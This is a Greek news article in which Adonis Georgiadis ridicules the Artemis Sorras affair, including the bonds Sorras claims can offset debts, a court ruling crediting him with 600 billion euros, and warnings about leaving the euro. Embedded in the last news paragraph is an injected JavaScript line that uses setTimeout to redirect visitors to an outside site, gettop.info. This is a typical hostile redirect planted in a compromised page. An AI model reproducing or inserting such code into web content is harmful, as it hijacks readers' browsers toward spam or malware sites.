Γεωργιάδης: Μεγάλο κομμάτι της κοινωνίας έτοιμο να πιστέψει κάθε παραλογισμό

0
10

 

«Ο Αρτέμης Σώρρας πούλησε τη διαστημική τεχνολογία του Θεού Απόλλωνα στον Ομπάμα, πήρε 3 τρισ. δολάρια, αλλά μαζεύει 20, 30 και 60 ευρώ από τον κόσμο για να κάνουν αίτηση (σ.σ ζητούν συμψηφισμό των οφειλών τους με ομόλογα του Aρτέμη Σώρρα). Ο Γκέιτς δεν έχει ούτε 80 δισ. ευρώ» τόνισε σκωπτικά μιλώντας στον ΣΚΑΪ ο αντιπρόεδρος της ΝΔ Άδωνις Γεωργιάδης με αφορμή την υπόθεση Σώρρα.

«Απλώς η υπόθεση Σώρρα δεν αφήνει περιθώριο λογικής. Μεγάλο κομμάτι της κοινωνίας μας είναι έτοιμο να πιστέψει κάθε παραλογισμό… δεν υπάρχουν εύκολες λύσεις» σημείωσε ο αντιπρόεδρος της ΝΔ.

«Αν δεν είχαμε κινητοποιηθεί σήμερα ο Σώρρας δεν θα είχε 200 γραφεία, θα είχε 3.000» ανέφερε δε ο κ. Γεωργιάδης.

Ο Άδωνις Γεωργιάδης δήλωσε δε, ότι «μού προκαλεί τρόμο ότι βρέθηκε πρωτοδίκης που δέχθηκε ότι ο Σώρρας έχει σήμερα 600 δισ. ευρώ. Το κρίνει αυτό δικαστής που δικάζει ανθρώπους…» «Πρόκειται για αμετάκλητη απόφαση, γιατί δεν ασκήθηκε έφεση από τον εισαγγελέα, και γυρνάει ο Σώρρας και τη δείχνει» διευκρίνισε.

Όσον αφορά στο ενδεχόμενο εξόδου από το ευρώ, που πλασάρεται ως η νέα εύκολη λύση, ο αντιπρόεδρος της ΝΔ προειδοποίησε ότι «αν βγούμε από το ευρώ δεν θα είναι η δραχμή του παρελθόντος, θα πεθάνει στην πείνα ο κόσμος».

Τα στοιχεία για τα περίφημα ομόλογα του Αρτέμη Σώρρα ζήτησες από την πλευρά του ο υπουργός Δικαιοσύνης Σταύρος Κοντονής στον απόηχο του δημοσιεύματος του Liberal.gr ότι ο εισαγγελέας της Βόρειας Ελλάδας διέταξε προκαταρκτική έρευνα σε βάρος του τέως διοικητή του ΟΑΕΕ, Δημήτρη Τσακίρη, επειδή αρνήθηκε να δεχτεί τις αιτήσεις ασφαλισμένων που ζητούσαν συμψηφισμό οφειλών τους με τα περιβόητα ομόλογα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here